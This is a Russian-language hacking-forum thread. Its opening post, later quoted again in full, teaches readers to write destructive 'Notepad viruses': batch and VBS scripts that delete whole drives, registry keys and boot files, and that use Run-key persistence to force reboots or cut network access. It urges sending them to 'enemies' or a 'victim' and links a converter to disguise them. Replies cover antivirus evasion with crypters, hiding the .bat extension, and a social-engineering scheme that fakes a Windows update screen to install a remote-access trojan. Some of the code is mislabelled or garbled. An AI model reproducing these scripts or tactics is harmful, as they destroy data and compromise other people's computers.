В блокноте создаём вирус.

[mixa264]

Сегодня мы узнаем, как создать вирус в блокноте. Это очень просто создавать вирусы и использовать их, но не смейте использовать их на вашем компьютере, так как эти вирусы могут разрушить вашу личную информацию.

Где использовать?

Вы можете отправить эти вирусы к своим врагам, или если вы хотите попробовать их то лучшее место для этого это компьютерные клубы или приобретайте второй компьютер.

Как сделать вирус?

Откройте Блокнот(Notepad)
Поставьте коды
Сохраните его в правильном расширения
Готово
Давайте начнем.

1.Удаляет все с дисководах компьютера

@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

Сохранить как «имя вашего файла.bat [Batch File]

2.Удаляет все что хранится в реестре

@echo OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

3.Хорошая шалость для ваших друзей. Это останавливает доступ в Интернет пользователя. Чтобы получить доступ обратно напишите IPconfig /renew в CMD.

@echo off
Ipconfig /release

4.Отправите другу небольшое сообщение и выключите его компьютер.

@echo off
msg * ваше сообщение
shutdown -c “ваше сообщение” -s

Это простой вирус, который заставляет компьютер дать ошибку.

Сохранить как (имя файла.VBS)

5.Этот простой вирус, форматируются диски менее чем за 5 секунд. Только диски D, Е и С.

Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next

6.Этот вирус может быть очень неприятный, останавливает компьютер каждый раз при его включении.

rd/s/q D:\
rd/s/q C:\
rd/s/q E:\

7.Этот вирус может быть очень неприятный, останавливает компьютер каждый раз при его включении.

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo купи новый комп этот кусок дерьма.
PAUSE

Теперь пришло время для нескольких очень опасных вирусов.

1.Заставляет систему упасть один раз потом компьютер не может быть перезапущен. Он удаляет все необходимое для запуска системы. Не использовать на себя.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

2.Этот вирус отключает Интернет навсегда.

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo (ваше сообщение)
PAUSE

Как сделать их рабочими?

Скачать и запустить конвертер.
Введите файл
Выберите значок
Версию и информацию
Компилируйте
Отправить своей жертве
Вот вам конвертер для созданых вирусов.

Скачать CONVERTER: https://yadi.sk/d/zLaPVa5ZvxCY8
https://www.virustotal.com/ru/file/...2ea41dd909dd1ec39eeb4a216e1f2d1bea8/analysis/

Наслаждайтесь и будьте осторожны! Удачи.

Просторы интернета.

 

[mrflex]

БАТники - такие себе вирусы.

 

[waydam]

Такие мелкие батники даже за вирусы считать нельзя.

 

[hohottt]

А как с этим контактируют антивирусы? Они позволяют этим батникам делать свои грязные делишки?

 

[Deegrees]

На сколько я понял , после открытия файла , начинает действовать код.

Такие мелкие батники даже за вирусы считать нельзя.

Если эти так себе. Где же взять более годные? Очень пригодились бы.

 

[rip1er]

А как с этим контактируют антивирусы? Они позволяют этим батникам делать свои грязные делишки?

АВ читают код батника - если он распознается как зловред - его делитят

 

[DDeenis]

А как с этим контактируют антивирусы? Они позволяют этим батникам делать свои грязные делишки?

у меня антивирус распознал его как вирус и удалил

 

[Vzlom.gold]

А вообще как вариант если есть доступ к пк жертве, то почему бы не попробовать изменить или удалить рег файл антивируса, чтоб он потом не мешал?

 

[mrflex]

Если эти так себе. Где же взять более годные? Очень пригодились бы.

Самопис на, например, C++.

 

[waydam]

На сколько я понял , после открытия файла , начинает действовать код.

Или купить на эксплоите. Только стоимость будет до 10к$

 

[RRaven]

На сколько я понял , после открытия файла , начинает действовать код.

При активации любого файла хочешь ты этого или нет - исполняется код. Любой твой клик - код. Этот форум - код. Эти буквы и текст - код.
Люди, - вы чего?
Я такими батничками баловался еще в школе, классе в 4.

 

[burjuy]

Немножко ликбеза. У любого антивируса есть несколько модулей обеспечения безопасности юзера.
При попадание на компьютер файл сначала сканируется АВ на наличие статических сигнатур (к примеру в файле есть строка "SIGN1") таких сигнатур может быть несколько. Потом, если антивирусу хватает статических сигнатур, что бы сразу поставить детект, то скан останавливается и файл как правило удаляется. Если же в файле присутствует к примеру пару сигнатур подозрительных, но ему не хватает информации, что бы однозначно сказать, что это вирус - происходит следующий этап "Эмуляция исполняемого кода программы". Антивирус проходит код программы и выполняет поведенческий анализ. На этом этапе список сигнатур может дополниться и файл будет опять задетекчен. Этот этап как правило обходят с помощью крипторов.
Если вирус прошел первичный анализ и запустился, то это еще не победа. Существует много вариаций как антивирус его найдет. Дам опять же пару примеров.
Проактивная защита. У разных аверов этот механизм реализован по разному. Как правило, антивирусы перехватывают вызовы функции (действия программы) и по определенным триггерам определяют может ли данная программа навредить юзеру. Проактивку остановить достатчно сложно, потому что этот метод защиты реализуют как правило на уровне ядра системы(KERNEL MODE). Тут как правило применяют разные методы срыва работы антивируса.
Также АВ сканируют оперативную память и опять же ищут в ней сигнатуры в момент, когда программа уже работает. К примеру , Вы спрятали свой вирус внутри криптора. Криптор прошел статический анализ, запустил программу и она висит в памяти уже в своем изначальном виде. Так АВ может найти это место в памяти и уже анализировать изначальную программу.

Вывод: не страдайте херней в блокноте. Учите си и асм или покупайте софт.

 

[Alinchok]

a я предлагаю отнестись к батникам с СИ. Пример как делал я:
Порвал я жопу но не смог собрать ратик без палева и решил не ломать башкою дверь , а попросить открыть ее
Создал одностраничник на котором крутится кружок Винды а ниже текст " Устанавливается обновление, не выключайте компьютер из сети"
писал в батнике старт на этот адрес а ниже хост скриптом открывал новое сообщение с тем же текстом, которое не закрывается без диспетчера ( таскилоф) и уже под этим делал что хотел. Отключал антивир с меседжом " идет обновление баз <<антивира>>" и поехали. Мой ратник сам устанавливался высылал мне айди и и я подключался.
Как же изначально впарить? да легко! Нам нужны
БАТНИК
какая то фигня без вирусов, к примеру - на тебе нормальный плейер (зависит от теметики где распространяешь)
и сам ратник
в батнике пишем код чтоб создавал ярлык с иконкой на нужный файл , потом запуск нашего подарка, потом меседжи на подобие, " сканирование завершено" и бла бла бла, чтоб усыпить бдительность и запуск ратника. Пока юзер удостоверится что ты реально скинул ему нормальный файл ратник все сделает. Очень хорошо работало когда скидывал чекеры и парсеры , ведь такое не каждый день подарят и народ сам даже выключал антвивр, хотя мне это и не надо было уже.
Конечно же это все старо , но для новичков самое оно.

 

[Alinchok]

забыл добавить все это дело надо запихнуть в SFX и все готово

 

[Удалённый пользователь 494]

Да никто уже так не делает давно,зае*али с темами про "Делаем вирус в блокноте",пользуйтесь эксплойтами..

 

[BtcMaker]

Немножко ликбеза. У любого антивируса есть несколько модулей обеспечения безопасности юзера.
При попадание на компьютер файл сначала сканируется АВ на наличие статических сигнатур (к примеру в файле есть строка "SIGN1") таких сигнатур может быть несколько. Потом, если антивирусу хватает статических сигнатур, что бы сразу поставить детект, то скан останавливается и файл как правило удаляется. Если же в файле присутствует к примеру пару сигнатур подозрительных, но ему не хватает информации, что бы однозначно сказать, что это вирус - происходит следующий этап "Эмуляция исполняемого кода программы". Антивирус проходит код программы и выполняет поведенческий анализ. На этом этапе список сигнатур может дополниться и файл будет опять задетекчен. Этот этап как правило обходят с помощью крипторов.
Если вирус прошел первичный анализ и запустился, то это еще не победа. Существует много вариаций как антивирус его найдет. Дам опять же пару примеров.
Проактивная защита. У разных аверов этот механизм реализован по разному. Как правило, антивирусы перехватывают вызовы функции (действия программы) и по определенным триггерам определяют может ли данная программа навредить юзеру. Проактивку остановить достатчно сложно, потому что этот метод защиты реализуют как правило на уровне ядра системы(KERNEL MODE). Тут как правило применяют разные методы срыва работы антивируса.
Также АВ сканируют оперативную память и опять же ищут в ней сигнатуры в момент, когда программа уже работает. К примеру , Вы спрятали свой вирус внутри криптора. Криптор прошел статический анализ, запустил программу и она висит в памяти уже в своем изначальном виде. Так АВ может найти это место в памяти и уже анализировать изначальную программу.

Вывод: не страдайте херней в блокноте. Учите си и асм или покупайте софт.

иконка масоны))
ты тоже в курсе за рабов системы и т.д?

 

[Vilivonka]

Сегодня мы узнаем, как создать вирус в блокноте. Это очень просто создавать вирусы и использовать их, но не смейте использовать их на вашем компьютере, так как эти вирусы могут разрушить вашу личную информацию.

Где использовать?

Вы можете отправить эти вирусы к своим врагам, или если вы хотите попробовать их то лучшее место для этого это компьютерные клубы или приобретайте второй компьютер.

Как сделать вирус?

Откройте Блокнот(Notepad)
Поставьте коды
Сохраните его в правильном расширения
Готово
Давайте начнем.

1.Удаляет все с дисководах компьютера

@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

Сохранить как «имя вашего файла.bat [Batch File]

2.Удаляет все что хранится в реестре

@echo OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

3.Хорошая шалость для ваших друзей. Это останавливает доступ в Интернет пользователя. Чтобы получить доступ обратно напишите IPconfig /renew в CMD.

@echo off
Ipconfig /release

4.Отправите другу небольшое сообщение и выключите его компьютер.

@echo off
msg * ваше сообщение
shutdown -c “ваше сообщение” -s

Это простой вирус, который заставляет компьютер дать ошибку.

Сохранить как (имя файла.VBS)

5.Этот простой вирус, форматируются диски менее чем за 5 секунд. Только диски D, Е и С.

Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next

6.Этот вирус может быть очень неприятный, останавливает компьютер каждый раз при его включении.

rd/s/q D:\
rd/s/q C:\
rd/s/q E:\

7.Этот вирус может быть очень неприятный, останавливает компьютер каждый раз при его включении.

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo купи новый комп этот кусок дерьма.
PAUSE

Теперь пришло время для нескольких очень опасных вирусов.

1.Заставляет систему упасть один раз потом компьютер не может быть перезапущен. Он удаляет все необходимое для запуска системы. Не использовать на себя.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

2.Этот вирус отключает Интернет навсегда.

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo (ваше сообщение)
PAUSE

Как сделать их рабочими?

Скачать и запустить конвертер.
Введите файл
Выберите значок
Версию и информацию
Компилируйте
Отправить своей жертве
Вот вам конвертер для созданых вирусов.

Скачать CONVERTER: https://yadi.sk/d/zLaPVa5ZvxCY8
https://www.virustotal.com/ru/file/...2ea41dd909dd1ec39eeb4a216e1f2d1bea8/analysis/

Наслаждайтесь и будьте осторожны! Удачи.

Просторы интернета.

А теперь поясните как скрыть слово .bat что бы если при отправке кому то не видно было что это батник.что бы был просто как файл

 

[HacerD1nero]

Если бомж поцелует мой бнокнот, тоже такой ни хуёвый вирус получится ​

 

[jediah]

имеется возможность их всех как-то объеденить?

 

[jediah]

А теперь поясните как скрыть слово .bat что бы если при отправке кому то не видно было что это батник.что бы был просто как файл

конвертнуть в .exe